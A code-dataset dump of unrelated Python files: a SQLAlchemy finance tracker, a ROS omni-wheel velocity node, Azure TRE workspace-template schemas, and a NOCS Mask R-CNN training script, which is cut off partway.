q1 = db.session.query(Tag.tgr_id.label('tag1'), Taggroup.gName.label('Category'), Taggroup.gColor.label('color'), func.SUM(Transaction.amount).label('Total'))\
.outerjoin(Tag, Transaction.tag_id == Tag.id)\
.outerjoin(Taggroup, Taggroup.id == Tag.tgr_id)\
.filter(Transaction.acc_id == account_id, Transaction.confirmed == True, Tag.isBlnc == False, extract('year',Transaction.traDate)<=gd[0])\
.group_by(Tag.tgr_id, Taggroup.gName, Taggroup.gColor)\
.order_by(Tag.tgr_id).subquery()
q2 = Transaction.get_stats_year(account_id, gd[1], 'tag2', 'Prev_Year')
q3 = Transaction.get_stats_year(account_id, gd[0], 'tag3', 'This_Year')
month_count = Transaction.count_months(account_id) if Transaction.count_months(account_id) < 12 else 12
q4 = db.session.query(Tag.tgr_id.label('tag4'), func.SUM(Transaction.amount/month_count).label('Avg_Month'))\
.outerjoin(Tag, Transaction.tag_id == Tag.id)\
.filter(Transaction.acc_id == account_id, Transaction.confirmed == True, Transaction.traDate>=gd[4], Transaction.traDate<gd[5])\
.group_by(Tag.tgr_id).subquery()
q5 = db.session.query(Tag.tgr_id.label('tag5'), func.SUM(Transaction.amount).label('Prev_Month'))\
.outerjoin(Tag, Transaction.tag_id == Tag.id)\
.filter(Transaction.acc_id == account_id, Transaction.confirmed == True, extract('year',Transaction.traDate)==gd[2], extract('month',Transaction.traDate)==gd[3])\
.group_by(Tag.tgr_id).subquery()
return db.session.query(q1.c.Category, q1.c.tag1, q1.c.Total, q2.c.Prev_Year, q3.c.This_Year, (100*(q3.c.This_Year/q2.c.Prev_Year)).label('%_YTD'), q4.c.Avg_Month, q5.c.Prev_Month, q1.c.color)\
.outerjoin(q2, q1.c.tag1 == q2.c.tag2)\
.outerjoin(q3, q1.c.tag1 == q3.c.tag3)\
.outerjoin(q4, q1.c.tag1 == q4.c.tag4)\
.outerjoin(q5, q1.c.tag1 == q5.c.tag5)\
.order_by(q1.c.tag1)
def get_stat_year_df(account_id, what_year):
tg = Taggroup.list_tgroup_id_inSum(account_id)
q = Transaction.get_stat_year(account_id, what_year)
df = pd.read_sql_query(q.statement, db.session.bind)
#transform valies from object to float
pd.options.display.float_format = '{:.2f}'.format
#exclude BILLS from summary
s = df.mask(~df['tag1'].isin(tg)).drop('tag1',1).sum()
#calculate '% YTD'
s.loc['%_YTD'] = 100*(s['This_Year'] / s['Prev_Year'])
#replace calculated value in specific position
df.loc[len(df)] = s
#replace summarised categ name
df = df.fillna({'Category':'Summary','tag1':0,'color':''})
#replace 'NaN' to '0', then limit decimals to 2
return df.fillna(0).round(2)
def get_stat_year_by_year(account_id):
tg = Taggroup.list_tgroup_id_inSum(account_id)
q = db.session.query( Tag.tgr_id.label('tag')\
, Taggroup.gName.label('Category')\
, Transaction.traDate.label('date')\
, Transaction.amount)\
.outerjoin(Tag, Transaction.tag_id == Tag.id)\
.outerjoin(Taggroup, Taggroup.id == Tag.tgr_id)\
.filter(Transaction.acc_id == account_id, Transaction.confirmed == True, Tag.isBlnc == False)\
.order_by(Tag.tgr_id)
df = pd.read_sql_query(q.statement, db.session.bind)
#add column 'year' based on 'date'
df['Year'] = pd.DatetimeIndex(df['date']).year
#groupby
df = df.groupby(['tag','Category','Year']).sum()
#pivot
df = pd.pivot_table(df, values = 'amount', index=['Category','tag'], columns = 'Year')\
.sort_values(by=['tag'], ascending=True)
#add column 'Total', to sum horizontally, per category
df.insert(loc=0, column='Total', value=df.sum(axis=1))
#add row 'Summary' to sum columns, except BILLS
df.loc['Summary'] = df.query("tag in @tg").sum()
#change FLOAT values to INT
return df.fillna(0).astype(int)
def chart_in_out(account_id):
sum_in = Transaction.query.with_entities(func.ABS(func.SUM(Transaction.amount)))\
.outerjoin(Tag)\
.filter(Transaction.acc_id == account_id, Transaction.amount > 0 \
, Tag.isBlnc == False \
, Transaction.traDate>=first_of_prev_month, Transaction.traDate<first_of_this_month)\
.scalar()
sum_out = Transaction.query.with_entities(func.ABS(func.SUM(Transaction.amount)))\
.outerjoin(Tag)\
.filter(Transaction.acc_id == account_id, Transaction.amount < 0 \
, Tag.isBlnc == False \
, Transaction.traDate>=first_of_prev_month, Transaction.traDate<first_of_this_month)\
.scalar()
return sum_in if sum_in is not None else 0, sum_out if sum_out is not None else 0
def chart_monthly_trend(account_id):
tag_inSum = Tag.list_tag_id_inSum(account_id)
month_by_month = db.session.query(\
func.TO_CHAR(Transaction.traDate,'YYYYMM').label('orderByCol')\
,func.TO_CHAR(Transaction.traDate,'MON').label('mnth')\
,func.SUM(Transaction.amount).label('total')\
,func.TEXT('Dummy').label('D'))\
.filter(Transaction.tag_id.in_(tag_inSum), Transaction.traDate>=minus_13_months, Transaction.traDate<first_of_this_month)\
.group_by(func.TO_CHAR(Transaction.traDate,'YYYYMM'),func.TO_CHAR(Transaction.traDate,'MON'),func.TEXT('Dummy'))\
.subquery()
month_count = Transaction.count_months(account_id) if Transaction.count_months(account_id) < 13 else 13
month_avg = db.session.query(\
func.TEXT('AvgYear').label('orderByCol')\
,func.TEXT('AvgMonth').label('MON')\
,func.SUM(Transaction.amount/month_count).label('total_avg')\
,func.TEXT('Dummy').label('D'))\
.filter(Transaction.tag_id.in_(tag_inSum), Transaction.traDate>=minus_13_months, Transaction.traDate<first_of_this_month)\
.subquery()
return db.session.query(month_by_month.c.orderByCol, month_by_month.c.mnth, month_by_month.c.total, month_avg.c.total_avg)\
.outerjoin(month_by_month, month_by_month.c.D == month_avg.c.D)\
.order_by(month_by_month.c.orderByCol)
class Taggroup(db.Model):
id = db.Column(db.Integer, primary_key=True, autoincrement=True)
gName = db.Column(db.String, nullable=False)
gColor = db.Column(db.String(11), nullable=False)
acc_id = db.Column(db.Integer, db.ForeignKey('account.id'), nullable=False)
def __repr__(self):
return '<TagGroup {}>'.format(self.gName)
def insert_tag_group(g_name, color, accid):
stmt = Taggroup(gName=g_name, gColor=color, acc_id=accid)
db.session.add(stmt)
db.session.commit()
newid = stmt.id
def update_tag_group(gid, g_name, color):
stmt = Taggroup.query.filter_by(id=gid).first()
stmt.gName = g_name
stmt.gColor = color
db.session.commit()
def delete_tag_group(gid):
stmt = Taggroup.query.filter_by(id=gid).first()
db.session.delete(stmt)
db.session.commit()
def list_tgroup(account_id):
return Taggroup.query.filter(Taggroup.acc_id == account_id).order_by(Taggroup.id)
def list_tgroup_id(account_id):
q = db.session.query(Taggroup.id).filter(Taggroup.acc_id==account_id).order_by(Taggroup.id).all()
return [val for val, in q]
def list_tgroup_id_one(account_id):
return db.session.query(Taggroup.id).filter(Taggroup.acc_id==account_id).order_by(Taggroup.id.desc()).first()
def list_count(account_id):
return db.session.query(db.func.count(Taggroup.id)).filter(Taggroup.acc_id==account_id).scalar()
def list_tgroup_id_inSum(account_id):
q = db.session.query(Taggroup.id)\
.outerjoin(Tag)\
.filter(Tag.inSum==True, Taggroup.acc_id==account_id)\
.distinct()
return [val for val, in q]
class Tag(db.Model):
id = db.Column(db.Integer, primary_key=True, autoincrement=True)
tName = db.Column(db.String, nullable=False)
tgr_id = db.Column(db.Integer, db.ForeignKey('taggroup.id'), nullable=False)
isBlnc = db.Column(db.Boolean, nullable=False, default=0)
inSum = db.Column(db.Boolean, nullable=False, default=1)
chart1 = db.Column(db.Boolean, nullable=False, default=0)
chart2 = db.Column(db.Boolean, nullable=False, default=0)
chart3 = db.Column(db.Boolean, nullable=False, default=0)
def __repr__(self):
return '<Tag {}>'.format(self.tName)
def insert_tag(t_name, g_id, balance, summary, c1, c2, c3):
stmt = Tag(tName=t_name, tgr_id=g_id, isBlnc=balance, inSum=summary, chart1=c1, chart2=c2, chart3=c3)
db.session.add(stmt)
db.session.commit()
def update_tag(tid, t_name, g_id, balance, summary, c1, c2, c3):
stmt = Tag.query.filter_by(id=tid).first()
stmt.tName = t_name
stmt.tgr_id = g_id
stmt.isBlnc = balance
stmt.inSum = summary
stmt.chart1 = c1
stmt.chart2 = c2
stmt.chart3 = c3
db.session.commit()
def delete_tag(tid):
stmt = Tag.query.filter_by(id=tid).first()
db.session.delete(stmt)
db.session.commit()
def list_tag(account_id):
return db.session.query(Tag.id ,Tag.tName ,Tag.tgr_id ,Tag.isBlnc ,Tag.inSum ,Tag.chart1 ,Tag.chart2 ,Tag.chart3)\
.outerjoin(Taggroup)\
.filter(Taggroup.acc_id==account_id)\
.order_by(Tag.tgr_id, Tag.id)
def list_tag_id(account_id):
q = db.session.query(Tag.id)\
.outerjoin(Taggroup)\
.filter(Taggroup.acc_id==account_id)
return [val for val, in q]
def list_tag_id_of_group(grpid,account_id):
q = db.session.query(Tag.id)\
.outerjoin(Taggroup)\
.filter(Tag.tgr_id==grpid, Taggroup.acc_id==account_id)
return [val for val, in q]
def list_tag_id_inSum(account_id):
q = db.session.query(Tag.id)\
.outerjoin(Taggroup)\
.filter(Tag.inSum==True, Taggroup.acc_id==account_id)
return [val for val, in q]
def list_count(account_id):
return db.session.query(db.func.count(Tag.id))\
.outerjoin(Taggroup)\
.filter(Taggroup.acc_id==account_id).scalar()
class Condition(db.Model):
id = db.Column(db.Integer, primary_key=True, autoincrement=True)
cName = db.Column(db.String, nullable=False)
tag_id = db.Column(db.Integer, db.ForeignKey('tag.id'), nullable=False)
acc_id = db.Column(db.Integer, db.ForeignKey('account.id'), nullable=False)
def __repr__(self):
return '<Condition {}>'.format(self.cName)
def insert_cond(cname, tag, accid):
stmt = Condition(cName=cname, tag_id=tag, acc_id=accid)
db.session.add(stmt)
db.session.commit()
def update_cond(cid, cName, tag):
stmt = Condition.query.filter_by(id=cid).first()
stmt.cName = cName
stmt.tag_id = tag
db.session.commit()
def delete_cond(cid):
stmt = Condition.query.filter_by(id=cid).first()
db.session.delete(stmt)
db.session.commit()
def list_cond(account_id):
return db.session.query(Condition.id, Condition.cName, Condition.tag_id)\
.outerjoin(Tag, Condition.tag_id == Tag.id)\
.filter(Condition.acc_id == account_id)\
.order_by(Tag.tgr_id, Condition.tag_id, Condition.id)
def list_count(account_id):
return db.session.query(db.func.count(Condition.id)).filter(Condition.acc_id==account_id).scalar()
class Description(db.Model):
id = db.Column(db.Integer, primary_key=True, autoincrement=True)
descfrom = db.Column(db.String, nullable=False)
descto = db.Column(db.String, nullable=True)
acc_id = db.Column(db.Integer, db.ForeignKey('account.id'), nullable=False)
def __repr__(self):
return '<Condition {}>'.format(self.descfrom)
def insert_desc(descfrom, descto, accid):
stmt = Description(descfrom=descfrom, descto=descto, acc_id=accid)
db.session.add(stmt)
db.session.commit()
def update_desc(id, descfrom, descto):
stmt = Description.query.filter_by(id=id).first()
stmt.descfrom = descfrom
stmt.descto = descto
db.session.commit()
def delete_desc(id):
stmt = Description.query.filter_by(id=id).first()
db.session.delete(stmt)
db.session.commit()
def list_desc(account_id):
return Description.query.filter(Description.acc_id == account_id).order_by(Description.descfrom)
def list_count(account_id):
return db.session.query(db.func.count(Description.id)).filter(Description.acc_id==account_id).scalar()
#create all tables based on models above
with app.app_context():
db.create_all() | 0.393385 | 0.147034 |
import rospy
from geometry_msgs.msg import Twist
from std_msgs.msg import Float64
from std_msgs.msg import Bool
import math
pubLeft = rospy.Publisher('/setpoint_left', Float64, queue_size=10)
pubRigth = rospy.Publisher('/setpoint_right', Float64, queue_size=10)
pubFront = rospy.Publisher('/setpoint_front', Float64, queue_size=10)
pubBack = rospy.Publisher('/setpoint_back', Float64, queue_size=10)
pubEnableLeft = rospy.Publisher('/left_wheel/left_wheel_pid_activate', Bool, queue_size=10)
pubEnableRigth = rospy.Publisher('/right_wheel/right_wheel_pid_activate', Bool, queue_size=10)
pubEnableFront = rospy.Publisher('/front_wheel/front_wheel_pid_activate', Bool, queue_size=10)
pubEnableBack = rospy.Publisher('/back_wheel/back_wheel_pid_activate', Bool, queue_size=10)
velMinima = 0.3
def setDesiredVel(data):
#print "Me llego mensaje Twist:\n Lineal:\n X: ",data.linear.x,"\n Y: ",data.linear.y,"\n Z: ",data.linear.z,"\n ANGULAR:\n X: ",data.angular.x,"\n Y: ",data.angular.y,"\n Z: ",data.angular.z
#ANALIZAR EL CASO EN EL QUE EL MENSAJE EN X ES IGUAL AL Y, ENTONCES DOS RUEDAS SE ANULAN Y FUNCIONAN SOLO DOS...
radioRobot = 0.45
vectorDeseado = [[data.linear.x],[data.linear.y],[data.angular.z * radioRobot]]
matrizMotores = [[-1*math.sin(0.785398),math.cos(0.785398),1],[-1*math.sin(2.35619),math.cos(2.35619),1],[-1*math.sin(3.92699),math.cos(3.92699),1],[-1*math.sin(5.49779),math.cos(5.49779),1]]
velMotores=[[0],[0],[0],[0]]
for columna in range(0,len(vectorDeseado)):
for fila in range(0,len(matrizMotores)):
velMotores[fila][0] += matrizMotores[fila][columna] * vectorDeseado[columna][0]
menor = False
"""
if(abs(data.linear.x) != abs(data.linear.y) or abs(data.angular.z) != 0):
for i in range(0,4):
print("IF num: " + str(i) + " vel: " + str(velMotores[i][0]))
if( ((velMotores[i][0] > (velMinima*-1)) and (velMotores[i][0] < velMinima)) ):
menor = True
break
else:
for i in range(0,4):
print("ELSE num: " + str(i) + " vel: " + str(velMotores[i][0]))
if( (velMotores[i][0] > (velMinima*-1)) and (velMotores[i][0] < velMinima) ):
if( (velMotores[i][0] > 0.1) or (velMotores[i][0] < -0.1) ):
menor = True
break
"""
if(not menor):
pubEnableLeft.publish(True)
pubEnableRigth.publish(True)
pubEnableFront.publish(True)
pubEnableBack.publish(True)
pubLeft.publish(velMotores[0][0])
pubFront.publish(velMotores[1][0])
pubRigth.publish(velMotores[2][0])
pubBack.publish(velMotores[3][0])
else:
pubLeft.publish(0)
pubFront.publish(0)
pubRigth.publish(0)
pubBack.publish(0)
def listener():
rospy.init_node('PID_General', anonymous=True)
rospy.Subscriber("/cmd_vel", Twist, setDesiredVel)
rospy.spin()
if __name__ == '__main__':
try:
listener()
except rospy.ROSInterruptException:
pass | src/hermesIII/src/PID_general.py | import rospy
from geometry_msgs.msg import Twist
from std_msgs.msg import Float64
from std_msgs.msg import Bool
import math
pubLeft = rospy.Publisher('/setpoint_left', Float64, queue_size=10)
pubRigth = rospy.Publisher('/setpoint_right', Float64, queue_size=10)
pubFront = rospy.Publisher('/setpoint_front', Float64, queue_size=10)
pubBack = rospy.Publisher('/setpoint_back', Float64, queue_size=10)
pubEnableLeft = rospy.Publisher('/left_wheel/left_wheel_pid_activate', Bool, queue_size=10)
pubEnableRigth = rospy.Publisher('/right_wheel/right_wheel_pid_activate', Bool, queue_size=10)
pubEnableFront = rospy.Publisher('/front_wheel/front_wheel_pid_activate', Bool, queue_size=10)
pubEnableBack = rospy.Publisher('/back_wheel/back_wheel_pid_activate', Bool, queue_size=10)
velMinima = 0.3
def setDesiredVel(data):
#print "Me llego mensaje Twist:\n Lineal:\n X: ",data.linear.x,"\n Y: ",data.linear.y,"\n Z: ",data.linear.z,"\n ANGULAR:\n X: ",data.angular.x,"\n Y: ",data.angular.y,"\n Z: ",data.angular.z
#ANALIZAR EL CASO EN EL QUE EL MENSAJE EN X ES IGUAL AL Y, ENTONCES DOS RUEDAS SE ANULAN Y FUNCIONAN SOLO DOS...
radioRobot = 0.45
vectorDeseado = [[data.linear.x],[data.linear.y],[data.angular.z * radioRobot]]
matrizMotores = [[-1*math.sin(0.785398),math.cos(0.785398),1],[-1*math.sin(2.35619),math.cos(2.35619),1],[-1*math.sin(3.92699),math.cos(3.92699),1],[-1*math.sin(5.49779),math.cos(5.49779),1]]
velMotores=[[0],[0],[0],[0]]
for columna in range(0,len(vectorDeseado)):
for fila in range(0,len(matrizMotores)):
velMotores[fila][0] += matrizMotores[fila][columna] * vectorDeseado[columna][0]
menor = False
"""
if(abs(data.linear.x) != abs(data.linear.y) or abs(data.angular.z) != 0):
for i in range(0,4):
print("IF num: " + str(i) + " vel: " + str(velMotores[i][0]))
if( ((velMotores[i][0] > (velMinima*-1)) and (velMotores[i][0] < velMinima)) ):
menor = True
break
else:
for i in range(0,4):
print("ELSE num: " + str(i) + " vel: " + str(velMotores[i][0]))
if( (velMotores[i][0] > (velMinima*-1)) and (velMotores[i][0] < velMinima) ):
if( (velMotores[i][0] > 0.1) or (velMotores[i][0] < -0.1) ):
menor = True
break
"""
if(not menor):
pubEnableLeft.publish(True)
pubEnableRigth.publish(True)
pubEnableFront.publish(True)
pubEnableBack.publish(True)
pubLeft.publish(velMotores[0][0])
pubFront.publish(velMotores[1][0])
pubRigth.publish(velMotores[2][0])
pubBack.publish(velMotores[3][0])
else:
pubLeft.publish(0)
pubFront.publish(0)
pubRigth.publish(0)
pubBack.publish(0)
def listener():
rospy.init_node('PID_General', anonymous=True)
rospy.Subscriber("/cmd_vel", Twist, setDesiredVel)
rospy.spin()
if __name__ == '__main__':
try:
listener()
except rospy.ROSInterruptException:
pass | 0.127151 | 0.135604 |
from typing import List
from pydantic import BaseModel, Field
from models.domain.resource import ResourceType
from models.domain.resource_template import ResourceTemplate, Parameter
def get_sample_workspace_template_object(template_name: str = "tre-workspace-vanilla") -> ResourceTemplate:
return ResourceTemplate(
id="a7a7a7bd-7f4e-4a4e-b970-dc86a6b31dfb",
name=template_name,
description="vanilla workspace bundle",
version="0.1.0",
parameters=[
Parameter(name="azure_location", type="string"),
Parameter(name="tre_id", type="string"),
Parameter(name="workspace_id", type="string"),
Parameter(name="address_space", type="string", default="10.2.1.0/24", description="VNet address space for the workspace services")
],
resourceType=ResourceType.Workspace,
current=True,
)
def get_sample_workspace_template() -> dict:
return get_sample_workspace_template_object().dict()
class WorkspaceTemplateNamesInList(BaseModel):
templateNames: List[str]
class Config:
schema_extra = {
"example": {
"templateNames": ["tre-workspace-vanilla", "tre-workspace-base"]
}
}
class WorkspaceTemplateInCreate(BaseModel):
name: str = Field(title="Name of workspace template")
version: str = Field(title="Version of workspace template")
description: str = Field(title=" Description of workspace template")
parameters: List[Parameter] = Field([], title="Workspace template parameters", description="Values for the parameters required by the workspace template")
current: bool = Field(title="Mark this version as current")
class Config:
schema_extra = {
"example": {
"name": "my-tre-workspace",
"version": "0.0.1",
"description": "workspace template for great product",
"parameters": [{
"name": "azure_location",
"type": "string"
}],
"current": "true"
}
}
class WorkspaceTemplateInResponse(BaseModel):
workspaceTemplate: ResourceTemplate
class Config:
schema_extra = {
"example": {
"resourceTemplateId": "49a7445c-aae6-41ec-a539-30dfa90ab1ae",
"workspaceTemplate": get_sample_workspace_template()
}
} | management_api_app/models/schemas/workspace_template.py | from typing import List
from pydantic import BaseModel, Field
from models.domain.resource import ResourceType
from models.domain.resource_template import ResourceTemplate, Parameter
def get_sample_workspace_template_object(template_name: str = "tre-workspace-vanilla") -> ResourceTemplate:
return ResourceTemplate(
id="a7a7a7bd-7f4e-4a4e-b970-dc86a6b31dfb",
name=template_name,
description="vanilla workspace bundle",
version="0.1.0",
parameters=[
Parameter(name="azure_location", type="string"),
Parameter(name="tre_id", type="string"),
Parameter(name="workspace_id", type="string"),
Parameter(name="address_space", type="string", default="10.2.1.0/24", description="VNet address space for the workspace services")
],
resourceType=ResourceType.Workspace,
current=True,
)
def get_sample_workspace_template() -> dict:
return get_sample_workspace_template_object().dict()
class WorkspaceTemplateNamesInList(BaseModel):
templateNames: List[str]
class Config:
schema_extra = {
"example": {
"templateNames": ["tre-workspace-vanilla", "tre-workspace-base"]
}
}
class WorkspaceTemplateInCreate(BaseModel):
name: str = Field(title="Name of workspace template")
version: str = Field(title="Version of workspace template")
description: str = Field(title=" Description of workspace template")
parameters: List[Parameter] = Field([], title="Workspace template parameters", description="Values for the parameters required by the workspace template")
current: bool = Field(title="Mark this version as current")
class Config:
schema_extra = {
"example": {
"name": "my-tre-workspace",
"version": "0.0.1",
"description": "workspace template for great product",
"parameters": [{
"name": "azure_location",
"type": "string"
}],
"current": "true"
}
}
class WorkspaceTemplateInResponse(BaseModel):
workspaceTemplate: ResourceTemplate
class Config:
schema_extra = {
"example": {
"resourceTemplateId": "49a7445c-aae6-41ec-a539-30dfa90ab1ae",
"workspaceTemplate": get_sample_workspace_template()
}
} | 0.842215 | 0.255762 |
import argparse
import os
import sys
import datetime
import re
import time
import numpy as np
from config import Config
import utils
import model as modellib
from dataset import NOCSDataset
# Root directory of the project
ROOT_DIR = os.getcwd()
# Directory to save logs and trained model
MODEL_DIR = os.path.join(ROOT_DIR, "logs")
# Path to COCO trained weights
COCO_MODEL_PATH = os.path.join(MODEL_DIR, "mask_rcnn_coco.h5")
class ScenesConfig(Config):
"""Configuration for training on the toy shapes dataset.
Derives from the base Config class and overrides values specific
to the toy shapes dataset.
"""
# Give the configuration a recognizable name
NAME = "ShapeNetTOI"
OBJ_MODEL_DIR = os.path.join(ROOT_DIR, 'data', 'obj_models')
# Train on 1 GPU and 8 images per GPU. We can put multiple images on each
# GPU because the images are small. Batch size is 8 (GPUs * images/GPU).
GPU_COUNT = 1
IMAGES_PER_GPU = 2
# Number of classes (including background)
NUM_CLASSES = 1 + 6 # background + 6 object categories
MEAN_PIXEL = np.array([[ 120.66209412, 114.70348358, 105.81269836]])
IMAGE_MIN_DIM = 480
IMAGE_MAX_DIM = 640
RPN_ANCHOR_SCALES = (16, 32, 48, 64, 128) # anchor side in pixels
# Reduce training ROIs per image because the images are small and have
# few objects. Aim to allow ROI sampling to pick 33% positive ROIs.
TRAIN_ROIS_PER_IMAGE = 64
# Use a small epoch since the data is simple
STEPS_PER_EPOCH = 1000
# use small validation steps since the epoch is small
VALIDATION_STEPS = 50
WEIGHT_DECAY = 0.0001
LEARNING_RATE = 0.001
LEARNING_MOMENTUM = 0.9
COORD_LOSS_SCALE = 1
COORD_USE_BINS = True
if COORD_USE_BINS:
COORD_NUM_BINS = 32
else:
COORD_REGRESS_LOSS = 'Soft_L1'
COORD_SHARE_WEIGHTS = False
COORD_USE_DELTA = False
COORD_POOL_SIZE = 14
COORD_SHAPE = [28, 28]
USE_BN = True
# if COORD_SHARE_WEIGHTS:
# USE_BN = False
USE_SYMMETRY_LOSS = True
RESNET = "resnet50"
TRAINING_AUGMENTATION = True
SOURCE_WEIGHT = [3, 1, 1] #'ShapeNetTOI', 'Real', 'coco'
class InferenceConfig(ScenesConfig):
GPU_COUNT = 1
IMAGES_PER_GPU = 1
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--gpu', default='0', type=str)
args = parser.parse_args()
os.environ['CUDA_VISIBLE_DEVICES']=args.gpu
print('Using GPU {}.'.format(args.gpu))
config = ScenesConfig()
config.display()
# dataset directories
#camera_dir = os.path.join('/6PACK/My_NOCS','data', 'camera')
camera_dir = os.path.join('/6PACK/My_NOCS','data')
real_dir = os.path.join('/6PACK/My_NOCS','data', 'real')
coco_dir = os.path.join('/6PACK/My_NOCS','data', 'coco')
# real classes
coco_names = ['BG', 'person', 'bicycle', 'car', 'motorcycle', 'airplane',
'bus', 'train', 'truck', 'boat', 'traffic light',
'fire hydrant', 'stop sign', 'parking meter', 'bench', 'bird',
'cat', 'dog', 'horse', 'sheep', 'cow', 'elephant', 'bear',
'zebra', 'giraffe', 'backpack', 'umbrella', 'handbag', 'tie',
'suitcase', 'frisbee', 'skis', 'snowboard', 'sports ball',
'kite', 'baseball bat', 'baseball glove', 'skateboard',
'surfboard', 'tennis racket', 'bottle', 'wine glass', 'cup',
'fork', 'knife', 'spoon', 'bowl', 'banana', 'apple',
'sandwich', 'orange', 'broccoli', 'carrot', 'hot dog', 'pizza',
'donut', 'cake', 'chair', 'couch', 'potted plant', 'bed',
'dining table', 'toilet', 'tv', 'laptop', 'mouse', 'remote',
'keyboard', 'cell phone', 'microwave', 'oven', 'toaster',
'sink', 'refrigerator', 'book', 'clock', 'vase', 'scissors',
'teddy bear', 'hair drier', 'toothbrush']
synset_names = ['BG', #0
'bottle', #1
'bowl', #2
'camera', #3
'can', #4
'laptop',#5
'mug'#6
]
class_map = {
'bottle': 'bottle',
'bowl':'bowl',
'cup':'mug',
'laptop': 'laptop',
}
coco_cls_ids = []
for coco_cls in class_map:
ind = coco_names.index(coco_cls)
coco_cls_ids.append(ind)
config.display()
# Create model in training mode
model = modellib.MaskRCNN(mode="training", config=config,
model_dir=MODEL_DIR)
# Which weights to start with?
init_with = "coco" # imagenet, coco, or last
if init_with == "imagenet":
model.load_weights(model.get_imagenet_weights(), by_name=True)
elif init_with == "coco":
# Load weights trained on MS COCO, but skip layers that
# are different due to the different number of classes
# See README for instructions to download the COCO weights
model.load_weights(COCO_MODEL_PATH, by_name=True,
exclude=["mrcnn_class_logits", "mrcnn_bbox_fc",
"mrcnn_bbox", "mrcnn_mask"])
elif init_with == "last":
# Load the last model you trained and continue training
model.load_weights(model.find_last()[1], by_name=True)
# Train the head branches
# Passing layers="heads" freezes all layers except the head
# layers. You can also pass a regular expression to select
# which layers to train by name pattern.
dataset_train = NOCSDataset(synset_names, 'train', config)
dataset_train.load_camera_scenes(camera_dir)
dataset_train.load_real_scenes(real_dir)
dataset_train.load_coco(coco_dir, "train", class_names=class_map.keys())
dataset_train.prepare(class_map)
# Validation dataset
dataset_val = NOCSDataset(synset_names, 'val', config)
dataset_val.load_camera_scenes(camera_dir)
dataset_val.prepare(class_map)
#print("Training network heads")
model.train(dataset_train, dataset_val,
learning_rate=config.LEARNING_RATE,
epochs=100,
layers_name='heads')
# Training - Stage 2
# Finetune layers from ResNet stage 4 and up
print("Training Resnet layer 4+")
model.train(dataset_train, dataset_val,
learning_rate=config.LEARNING_RATE/10,
epochs=130,
layers_name='4+')
# Training - Stage 3
# Finetune layers from ResNet stage 3 and up
print("Training Resnet layer 3+")
model.train(dataset_train, dataset_val,
learning_rate=config.LEARNING_RATE/100,
epochs=400,
layers_name='all') | research/6D_Pose/nocs_train.py | import argparse
import os
import sys
import datetime
import re
import time
import numpy as np
from config import Config
import utils
import model as modellib
from dataset import NOCSDataset
# Root directory of the project
ROOT_DIR = os.getcwd()
# Directory to save logs and trained model
MODEL_DIR = os.path.join(ROOT_DIR, "logs")
# Path to COCO trained weights
COCO_MODEL_PATH = os.path.join(MODEL_DIR, "mask_rcnn_coco.h5")
class ScenesConfig(Config):
"""Configuration for training on the toy shapes dataset.
Derives from the base Config class and overrides values specific
to the toy shapes dataset.
"""
# Give the configuration a recognizable name
NAME = "ShapeNetTOI"
OBJ_MODEL_DIR = os.path.join(ROOT_DIR, 'data', 'obj_models')
# Train on 1 GPU and 8 images per GPU. We can put multiple images on each
# GPU because the images are small. Batch size is 8 (GPUs * images/GPU).
GPU_COUNT = 1
IMAGES_PER_GPU = 2
# Number of classes (including background)
NUM_CLASSES = 1 + 6 # background + 6 object categories
MEAN_PIXEL = np.array([[ 120.66209412, 114.70348358, 105.81269836]])
IMAGE_MIN_DIM = 480
IMAGE_MAX_DIM = 640
RPN_ANCHOR_SCALES = (16, 32, 48, 64, 128) # anchor side in pixels
# Reduce training ROIs per image because the images are small and have
# few objects. Aim to allow ROI sampling to pick 33% positive ROIs.
TRAIN_ROIS_PER_IMAGE = 64
# Use a small epoch since the data is simple
STEPS_PER_EPOCH = 1000
# use small validation steps since the epoch is small
VALIDATION_STEPS = 50
WEIGHT_DECAY = 0.0001
LEARNING_RATE = 0.001
LEARNING_MOMENTUM = 0.9
COORD_LOSS_SCALE = 1
COORD_USE_BINS = True
if COORD_USE_BINS:
COORD_NUM_BINS = 32
else:
COORD_REGRESS_LOSS = 'Soft_L1'
COORD_SHARE_WEIGHTS = False
COORD_USE_DELTA = False
COORD_POOL_SIZE = 14
COORD_SHAPE = [28, 28]
USE_BN = True
# if COORD_SHARE_WEIGHTS:
# USE_BN = False
USE_SYMMETRY_LOSS = True
RESNET = "resnet50"
TRAINING_AUGMENTATION = True
SOURCE_WEIGHT = [3, 1, 1] #'ShapeNetTOI', 'Real', 'coco'
class InferenceConfig(ScenesConfig):
GPU_COUNT = 1
IMAGES_PER_GPU = 1
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--gpu', default='0', type=str)
args = parser.parse_args()
os.environ['CUDA_VISIBLE_DEVICES']=args.gpu
print('Using GPU {}.'.format(args.gpu))
config = ScenesConfig()
config.display()
# dataset directories
#camera_dir = os.path.join('/6PACK/My_NOCS','data', 'camera')
camera_dir = os.path.join('/6PACK/My_NOCS','data')
real_dir = os.path.join('/6PACK/My_NOCS','data', 'real')
coco_dir = os.path.join('/6PACK/My_NOCS','data', 'coco')
# real classes
coco_names = ['BG', 'person', 'bicycle', 'car', 'motorcycle', 'airplane',
'bus', 'train', 'truck', 'boat', 'traffic light',
'fire hydrant', 'stop sign', 'parking meter', 'bench', 'bird',
'cat', 'dog', 'horse', 'sheep', 'cow', 'elephant', 'bear',
'zebra', 'giraffe', 'backpack', 'umbrella', 'handbag', 'tie',
'suitcase', 'frisbee', 'skis', 'snowboard', 'sports ball',
'kite', 'baseball bat', 'baseball glove', 'skateboard',
'surfboard', 'tennis racket', 'bottle', 'wine glass', 'cup',
'fork', 'knife', 'spoon', 'bowl', 'banana', 'apple',
'sandwich', 'orange', 'broccoli', 'carrot', 'hot dog', 'pizza',
'donut', 'cake', 'chair', 'couch', 'potted plant', 'bed',
'dining table', 'toilet', 'tv', 'laptop', 'mouse', 'remote',
'keyboard', 'cell phone', 'microwave', 'oven', 'toaster',
'sink', 'refrigerator', 'book', 'clock', 'vase', 'scissors',
'teddy bear', 'hair drier', 'toothbrush']
synset_names = ['BG', #0
'bottle', #1
'bowl', #2
'camera', #3
'can', #4
'laptop',#5
'mug'#6
]
class_map = {
'bottle': 'bottle',
'bowl':'bowl',
'cup':'mug',
'laptop': 'laptop',
}
coco_cls_ids = []
for coco_cls in class_map:
ind = coco_names.index(coco_cls)
coco_cls_ids.append(ind)
config.display()
# Create model in training mode
model = modellib.MaskRCNN(mode="training", config=config,
model_dir=MODEL_DIR)
# Which weights to start with?
